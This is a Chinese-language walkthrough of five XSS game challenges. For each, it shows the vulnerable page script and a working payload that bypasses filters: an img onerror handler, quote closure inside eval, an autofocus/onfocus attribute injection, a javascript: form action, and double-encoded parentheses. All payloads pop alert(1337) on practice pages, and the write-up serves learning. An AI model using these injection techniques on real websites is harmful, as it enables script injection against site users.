xss 漏洞复现

xss 漏洞复现

一，xss game

1，源码

<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

题目分析：接收somebody参数放入innerHTML，然后放在

标签展示。innerHTML标签中警用了script标签，所以使用标签。

?somebody=<img src=1 onerror="alert(1337)">

2，源码

<!-- Challenge -->
<h2 id="maname"></h2>
<script>let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")let ma = ""eval(`ma = "Ma name ${jeff}"`)setTimeout(_ => {maname.innerText = ma}, 1000)
</script>//eval(`ma = "Ma name a";alert(1337);""`)

题目分析：innertext会把<>当成字符串解析，安全系数很高，此题危险方法是eval，进行闭合操作。

思路一  ?jeff=a";alert(1337);"
思路二  ?jeff=a"-alert(1337);-"  连接符?jeff=a"-alert(1337);"

3，源码

<!-- Challenge -->
<div id="uganda"></div>
<script>let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");wey = wey.replace(/[<>]/g, '')  //过滤了<>uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

题目分析：闭合"${wey}"处的双引号，加入我们的方法。

?wey=aaa"%20onfocus=alert(1337)%20autofocus="    
autofocus自动对焦
onfocus=alert(1337) 焦点存在时触发函数

4，源码

<!-- Challenge -->
<form id="ricardo" method="GET"><input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')setTimeout(_ => {ricardo.submit()}, 2000)  //两秒后自动提交
</script>

题目分析：表单的action处也会出现相应的伪协议事件，需要提交触发。

​

?ricardo=javascript:alert(1337)

5，源码

<!-- Challenge -->
<h2 id="will"></h2>
<script>smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")smith = smith.replace(/[\(\`\)\\]/g, '') will.innerHTML = smith
</script>

题目分析：过滤了()`\ 双层编码() %2528 %2529 浏览器会转一次。加location识别编码

?markassbrownlee=<img%20src=1%20onerror=location="javascript:alert%25281337%2529">

img%20src=1%20οnerrοr=location=“javascript:alert%25281337%2529”>

[外链图片转存中...(img-INiW5cpV-1724041595122)]